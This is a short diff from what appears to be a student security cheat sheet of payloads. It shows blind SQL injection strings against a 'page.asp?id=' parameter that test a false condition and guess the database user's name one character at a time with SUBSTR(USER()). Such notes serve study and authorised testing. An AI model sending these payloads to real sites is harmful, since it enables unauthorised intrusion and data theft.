brianlam38/Sec-Cheatsheets/6843_Payloads.md

 page.asp?id=1 and 1=2 -- false

 /* Enumerate username string */
+-- Note: USER() is a MySQL function to return the current user and hostname as a string.
-page.asp?id=1 and SUBSTR(USER(), 1, 1) = 'a'
+-- Use SUBSTR() method to enumerate other information too. page.asp?id=1 and SUBSTR(USER(), 1, 1) = 'a'
 page.asp?id=1 and SUBSTR(USER(), 1, 1) = 'd'  -- repeat 'a','d','m','i','n'
 ```